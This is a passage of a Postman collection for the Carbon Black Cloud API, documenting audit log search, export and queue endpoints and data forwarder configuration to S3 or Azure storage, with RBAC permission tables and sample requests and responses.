Path=/policy-assignment; Secure; HttpOnly"},{"key":"Strict-Transport-Security","value":"max-age=15724800; includeSubDomains"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"preview\": [\n        {\n            \"current_policy\": {\n                \"id\": 465946,\n                \"position\": 1\n            },\n            \"new_policy\": {\n                \"id\": 20578754,\n                \"position\": 2\n            },\n            \"asset_count\": 18,\n            \"asset_query\": \"(-_exists_:ag_agg_key_manual AND ag_agg_key_dynamic:dde4e64893bbec9278b2beac4d6437c7f56114ffe0f40b5947e1c2e33e22829f AND policy_override:false) OR (ag_agg_key_manual:2c7190a37a11f4af3635e77f2d7ee9f61f659f7c49afbb663435f7846c6ec0c7 AND ag_agg_key_dynamic:dde4e64893bbec9278b2beac4d6437c7f56114ffe0f40b5947e1c2e33e22829f AND policy_override:false)\"\n        }\n    ]\n}"}],"_postman_id":"2008d0fd-6d86-4a32-b18f-5122a594c894"}],"id":"c863c6b1-37e4-4e14-98a9-a4071dddea85","_postman_id":"c863c6b1-37e4-4e14-98a9-a4071dddea85","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Audit Log API","item":[{"name":"Search Audit Logs","id":"f8e43569-0253-4423-ad63-3a40d7e25eed","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"actor_ip\": [ \"<string>\" ],\n    \"actor\": [ \"<string>\" ],\n    \"request_url\": [ \"<string>\" ],\n    \"description\": [ \"<string>\" ],\n    \"flagged\": <boolean>,\n    \"verbose\": <boolean>,\n    \"create_time\": {\n      \"start\": \"<string>\",\n      \"end\": \"<string>\",\n      \"range\": \"<string>\"\n    }\n  },\n  \"exclusions\": {\n    \"actor_ip\": [ \"<string>\" ],\n    \"actor\": [ \"<string>\" ],\n    \"request_url\": [ \"<string>\" ],\n    \"description\": [ \"<string>\" ],\n    \"flagged\": <boolean>,\n    \"verbose\": <boolean>,\n    \"create_time\": {\n      \"start\": \"<string>\",\n      \"end\": \"<string>\",\n      \"range\": \"<string>\"\n    }\n  },\n  \"query\": \"<string>\",\n  \"rows\": \"<string>\",\n  \"start\": \"<string>\",\n  \"sort\": [{\n    \"field\": \"<string>\",\n    \"order\": \"<string>\"\n  }]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_search","description":"<p>Search for audit logs using query, criteria and exclusion operators.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.audits</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#search-audit-logs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["audit_log","v1","orgs","{{cb_org_key}}","logs","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"68a49d41-95b1-412c-81d4-53ec3f708916","name":"Search Audit Logs","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"actor\": [\"user1@mydomain.com\"]\n    },\n    \"exclusions\": {\n        \"actor_ip\": [\"16.123.34.57\", \"65.59.12.34\"]\n    },\n    \"query\": \"Logged in\",\n    \"rows\": 1000,\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"ASC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_search"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 2,\n    \"num_available\": 2,\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"actor_ip\": \"50.215.71.123\",\n            \"actor\": \"user1@mydomain.com\",\n            \"request_url\": null,\n            \"description\": \"Logged in successfully\",\n            \"flagged\": false,\n            \"verbose\": false,\n            \"create_time\": \"2023-11-02T18:13:44.276Z\"\n        },\n        {\n            \"org_key\": \"ABCD1234\",\n            \"actor_ip\": \"50.215.71.123\",\n            \"actor\": \"user1@mydomain.com\",\n            \"request_url\": null,\n            \"description\": \"Logged in successfully\",\n            \"flagged\": false,\n            \"verbose\": false,\n            \"create_time\": \"2023-11-02T16:29:59.793Z\"\n        }\n    ]\n}"}],"_postman_id":"f8e43569-0253-4423-ad63-3a40d7e25eed"},{"name":"Export Audit Logs","id":"e9003564-ecdb-41c2-982e-6195730d5fb4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"criteria\": {\n    \"actor_ip\": [ \"<string>\" ],\n    \"actor\": [ \"<string>\" ],\n    \"request_url\": [ \"<string>\" ],\n    \"description\": [ \"<string>\" ],\n    \"flagged\": <boolean>,\n    \"verbose\": <boolean>,\n    \"create_time\": {\n      \"start\": \"<string>\",\n      \"end\": \"<string>\",\n      \"range\": \"<string>\"\n    }\n  },\n  \"exclusions\": {\n    \"actor_ip\": [ \"<string>\" ],\n    \"actor\": [ \"<string>\" ],\n    \"request_url\": [ \"<string>\" ],\n    \"description\": [ \"<string>\" ],\n    \"flagged\": <boolean>,\n    \"verbose\": <boolean>,\n    \"create_time\": {\n      \"start\": \"<string>\",\n      \"end\": \"<string>\",\n      \"range\": \"<string>\"\n    }\n  },\n  \"format\": \"<string>\",\n  \"query\": \"<string>\",\n  \"rows\": \"<string>\",\n  \"start\": \"<string>\",\n  \"sort\": [{\n    \"field\": \"<string>\",\n    \"order\": \"<string>\"\n  }]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_export","description":"<p>Export audit logs in your organization using the job service.</p>\n<p>To receive the actual JSON or CSV results, you need to use the <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a>. First, use the <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/#get-job-details\">Get Job Details</a> to get the status of the async job, then <a href=\"http://localhost:1313/reference/carbon-black-cloud/platform/latest/job-service-api/#download-job-output\">Download Job Output</a> call to download the actual content.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.audits</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#export-audit-logs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["audit_log","v1","orgs","{{cb_org_key}}","logs","_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"869b564a-0166-469b-959e-46b1016d3797","name":"Export Audit Logs","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"actor\": [\"user1@mydomain.com\"]\n    },\n    \"exclusions\": {\n        \"actor_ip\": [\"16.123.34.57\", \"65.59.12.34\"]\n    },\n    \"sort\": [\n        {\n            \"field\": \"create_time\",\n            \"order\": \"ASC\"\n        }\n    ],\n    \"query\": \"Logged in\",\n    \"format\": \"csv\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_export"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": 12700852\n}"}],"_postman_id":"e9003564-ecdb-41c2-982e-6195730d5fb4"},{"name":"Fetch from Audit Log Queue","id":"2d87dbab-665d-4336-9cc4-c389bc2e56ed","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_queue","description":"<p>Get the next group of audit logs in the queue.</p>\n<p>Each API key has their own queue and will be initialized with the last 3 days of Audit Logs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.audits</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p>See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#authentication\">Authentication</a> section of these APIs for more information on what is required to authenticate these requests.</p>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/audit-logs/#fetch-from-audit-log-queue\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["audit_log","v1","orgs","{{cb_org_key}}","logs","_queue"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"a33eb6f5-b965-4eca-8fc1-c1ec431fd5b9","name":"Fetch from Audit Log Queue","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/audit_log/v1/orgs/{{cb_org_key}}/logs/_queue"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 2,\n    \"num_available\": 2,\n    \"results\": [\n        {\n            \"org_key\": \"ABCD1234\",\n            \"actor_ip\": \"50.215.71.123\",\n            \"actor\": \"user1@mydomain.com\",\n            \"request_url\": null,\n            \"description\": \"Logged in successfully\",\n            \"flagged\": false,\n            \"verbose\": false,\n            \"create_time\": \"2023-11-02T18:13:44.276Z\"\n        },\n        {\n            \"org_key\": \"ABCD1234\",\n            \"actor_ip\": \"50.215.71.123\",\n            \"actor\": \"user1@mydomain.com\",\n            \"request_url\": null,\n            \"description\": \"Logged in successfully\",\n            \"flagged\": false,\n            \"verbose\": false,\n            \"create_time\": \"2023-11-02T16:29:59.793Z\"\n        }\n    ]\n}"}],"_postman_id":"2d87dbab-665d-4336-9cc4-c389bc2e56ed"}],"id":"afbe6b1d-c012-4de9-817d-5f6fba003495","_postman_id":"afbe6b1d-c012-4de9-817d-5f6fba003495","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Data Forwarder Configuration API","item":[{"name":"Deprecated","item":[{"name":"⚠️ Create Forwarder","event":[{"listen":"test","script":{"exec":["pm.test(\"Setting config_id after successful creation\",","    function() {","        var response = pm.response.json();","        pm.response.to.have.status(201);","        pm.environment.set(\"cb_forwarder_id\", response.id)","    }",")"],"type":"text/javascript","id":"0b187322-3fcc-4f24-b26b-40dfa665221a"}}],"id":"fa788264-0a92-40e9-b87d-e4aea65189f1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"name\":\"<string>\",\r\n    \"s3_bucket_name\":\"<string>\",\r\n    \"s3_prefix\":\"<string>\",\r\n    \"type\":\"<string>\",\r\n    \"filters\": [{\r\n        \"attribute\": \"<string>\",\r\n        \"equals\": \"<string>\",\r\n        \"not_equals\": \"<string>\",\r\n        \"match_any_bits\": [\r\n            \"<string>\",\r\n            \"<string>\"\r\n        ]\r\n    }]\r\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v1/orgs/{{cb_org_key}}/configs","description":"<p>Use this call to create a new forwarder. The API will then make calls to check whether the Forwarder can write to the specified S3 Bucket using the configuration supplied. It will attempt to write a test message called <code>healthcheck.json</code> to the specified bucket. If the bucket is misconfigured (i.e. incorrect permissions, principle arn, etc.) or the configuration is incorrect (i.e. bucket prefix doesn’t match path specified in policy), the API will respond with a <code>400</code> error and message with information about what was incorrect and how to fix the issue.</p>\n<p>If you want to forward both alert type data and endpoint.event type data, you should create a separate forwarder for each. The forwarder should be configured to send the data to its own subfolder in the S3 bucket using the S3 prefix property. The subfolder you configure will be automatically added to the S3 bucket.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"schema\">Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Definition</th>\n<th>Data Type</th>\n<th>Values</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>name</code></td>\n<td>Defined name for the specific event or alert forwarder</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>s3_bucket_name</code></td>\n<td>Configured unique name for s3 bucket</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>s3_prefix</code></td>\n<td>Defined folder structure the forwarder will write events or alerts to</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>type</code></td>\n<td>The datastream type that is to be forwarded.</td>\n<td>String</td>\n<td><code>endpoint.event</code>, <code>alert</code></td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>filters</code></td>\n<td>A list of filters to apply to the data being forwarded. Use only one of <code>equals</code>, <code>not_equals</code>, or <code>match_any_bits</code> per filter in the list. Only supported when type equals <code>endpoint.event</code></td>\n<td>Array</td>\n<td><code>[{ \"attribute\": \"&lt;string&gt;\", \"equals\": \"&lt;string&gt;\", \"not_equals\": \"&lt;string&gt;\", \"match_any_bits\": [\"&lt;string&gt;\", \"&lt;string&gt;\"]}]</code></td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api/#create-forwarder\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v1","orgs","{{cb_org_key}}","configs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"fa788264-0a92-40e9-b87d-e4aea65189f1"},{"name":"⚠️ Forwarder Healthcheck","id":"73487420-e84b-43df-816c-30e038fff69e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v1/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}/health_check","description":"<p>This call can be used to run a healthcheck on an Forwarder to determine if the forwarder is able to write to the specified S3 Bucket using the existing configuration. The healthcheck can indicate if the bucket is misconfigured (i.e. incorrect permissions, principle arn, etc.), if the configuration is incorrect (i.e. bucket prefix doesn’t match path specified in policy), or if the forwarder is working as expected. If successful, the healthcheck will write a test message called <code>healthcheck.json</code> to your S3 bucket and respond with a <code>200</code>, regardless of whether the API was able to write to the bucket.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api/#forwarder-healthcheck\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v1","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}","health_check"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"73487420-e84b-43df-816c-30e038fff69e"},{"name":"⚠️ Delete Forwarder","id":"c70554f8-411c-4326-b9a8-822ae7cbc71b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":""},"url":"{{cb_url}}/data_forwarder/v1/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}","description":"<p>Use this call to delete a forwarder.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api/#delete-forwarder\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v1","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c70554f8-411c-4326-b9a8-822ae7cbc71b"},{"name":"⚠️ Get Configured Forwarders","id":"3bcc5852-ec2e-430a-be88-2c2c52a7d4c2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/data_forwarder/v1/orgs/{{cb_org_key}}/configs","description":"<p>Get all configured forwarders and their information</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api/#get-configured-forwarders\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v1","orgs","{{cb_org_key}}","configs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"3bcc5852-ec2e-430a-be88-2c2c52a7d4c2"},{"name":"⚠️ Edit Forwarder","id":"e5ce7334-a428-439f-b44e-89918fe4b538","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"name\":\"<string>\",\r\n    \"s3_bucket_name\":\"<string>\",\r\n    \"s3_prefix\":\"<string>\",\r\n    \"type\":\"<string>\",\r\n    \"filters\": [{\r\n        \"attribute\": \"<string>\",\r\n        \"equals\": \"<string>\",\r\n        \"not_equals\": \"<string>\",\r\n        \"match_any_bits\": [\r\n            \"<string>\",\r\n            \"<string>\"\r\n        ]\r\n    }]\r\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/data_forwarder/v1/orgs/{{cb_org_key}}/configs/{{cb_forwarder_id}}","description":"<p>This call is used to edit an existing forwarder. You can edit the Enabling/Disabling functionality or change the s3 bucket name.</p>\n<p>When editing an existing forwarder, the API will make additional calls to check whether the Carbon Black Cloud event or alert forwarder can write to the specified S3 Bucket using the configuration supplied. It will attempt to write a test message called <code>healthcheck.json</code> to the specified bucket. If the bucket is misconfigured (i.e. incorrect permissions, principle arn, etc.) or the configuration is incorrect (i.e. bucket prefix doesn’t match path specified in policy or bucket does not exist), the Event Forwarder Configuration API will respond with a <code>400</code> and message including information regarding what was incorrect, providing the customer with feedback that enables them to fix issues as needed.</p>\n<p>If you want to remove filters that are applied to your configuration then update the configuration with an empty array for the filters property.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"schema\">Schema</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Field</th>\n<th>Definition</th>\n<th>Data Type</th>\n<th>Values</th>\n<th>Required</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td><code>name</code></td>\n<td>Defined name for the specific event or alert forwarder</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>s3_bucket_name</code></td>\n<td>Configured unique name for s3 bucket</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>s3_prefix</code></td>\n<td>Defined folder structure the forwarder will write events or alerts to</td>\n<td>String</td>\n<td>N/A</td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>type</code></td>\n<td>The datastream type that is to be forwarded.</td>\n<td>String</td>\n<td><code>endpoint.event</code>, <code>alert</code></td>\n<td>Yes</td>\n</tr>\n<tr>\n<td><code>filters</code></td>\n<td>A list of filters to apply to the data being forwarded. Use only one of <code>equals</code>, <code>not_equals</code>, or <code>match_any_bits</code> per filter in the list. Only supported when type equals <code>endpoint.event</code></td>\n<td>Array</td>\n<td><code>[{ \"attribute\": \"&lt;string&gt;\", \"equals\": \"&lt;string&gt;\", \"not_equals\": \"&lt;string&gt;\", \"match_any_bits\": [\"&lt;string&gt;\", \"&lt;string&gt;\"]}]</code></td>\n<td>No</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/eventforwarder-api/#edit-forwarder\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["data_forwarder","v1","orgs","{{cb_org_key}}","configs","{{cb_forwarder_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"e5ce7334-a428-439f-b44e-89918fe4b538"}],"id":"e942f55c-b9a6-4fd5-9a4d-c94e08fc9501","_postman_id":"e942f55c-b9a6-4fd5-9a4d-c94e08fc9501","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Create Forwarder","event":[{"listen":"test","script":{"exec":["pm.test(\"Setting config_id after successful creation\",","    function() {","        var response = pm.response.json();","        pm.response.to.have.status(201);","        pm.environment.set(\"cb_forwarder_id\", response.id)","    }",")"],"type":"text/javascript","id":"3c677a63-d8da-4cb2-ba15-d04af0f1ca24"}}],"id":"f12c1356-5617-4f16-a85b-d23890edec8f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"name\": \"Demo Create Azure Alert\",\n    \"enabled\": false,\n    \"type\": \"alert\",\n    \"version_constraint\": \"2.0.0\",\n    \"destination\": \"azure_blob_storage\",\n    \"azure_storage_account\": \"azuredemo\",\n    \"azure_container_name\": \"azure-event-dmo\",\n    \"azure_tenant_id\": \"a12345bc-1abcd-1a2b-a1b2-ab12c3de45f6\",\n    \"azure_client_id\": \"X98766yz-z987-z9x8-z9x8-zx98y7vw65u4\",\n    \"s3_prefix\": \"demo-event\",\n    \"s3_bucket_name\": \"demo-bucket\"\n}"},"url":"{{cb_url}}/data_forwarder/v2/orgs/{{cb_org_key}}/configs","description":"<p>Use this call to create a new forwarder. The API will then make calls to check whether the Forwarder can write to the specified S3 Bucket using the configuration supplied. The API will then make calls to check whether the Forwarder can write to the specified storage using the configuration supplied. It will attempt to write a test message called <code>healthcheck.json</code> to the specified bucket under a sub-folder called <code>healthcheck</code> or container. If the bucket is misconfigured (e.g. incorrect permissions, principle arn, etc.) or the configuration is incorrect (e.g. bucket prefix doesn't match path specified in policy), the API will respond with a <code>400</code> error and message with information about what was incorrect and how to fix the issue.</p>\n<p>If you want to forward alert type data, endpoint.event type data and watchlist hit type data, you must create a separate forwarder for each.</p>\n<p>The forwarder should be configured to send the data to its own subfolder in the S3 bucket using the S3 prefix property, and the subfolder you configure will be automatically added to the S3 bucket. A separate container should be used in Azure Blob Storage.</p>\n<p>Support for the Azure Blob Storage destination was added in January 2024. See the announcement on the <a href=\"https://developer.carbonblack.com/blog\">Developer Network Blog</a> for more information.</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"name\": \"&lt;string&gt;\",\n  \"azure_client_id\": \"&lt;string&gt;\",\n  \"azure_container_name\": \"&lt;string&gt;\",\n  \"azure_storage_account\": \"&lt;string&gt;\",\n  \"azure_tenant_id\": \"&lt;string&gt;\",\n  \"s3_bucket_name\": \"&lt;string&gt;\",\n  \"s3_prefix\": \"&lt;string&gt;\",\n  \"type\": \"&lt;string&gt;\",\n  \"enabled\": &lt;boolean&gt;,\n  \"version_constraint\": \"&lt;string&gt;\",\n  \"destination\": \"&lt;string&gt;\"\n}\n\n</code></pre>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>event-forwarder.settings</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a 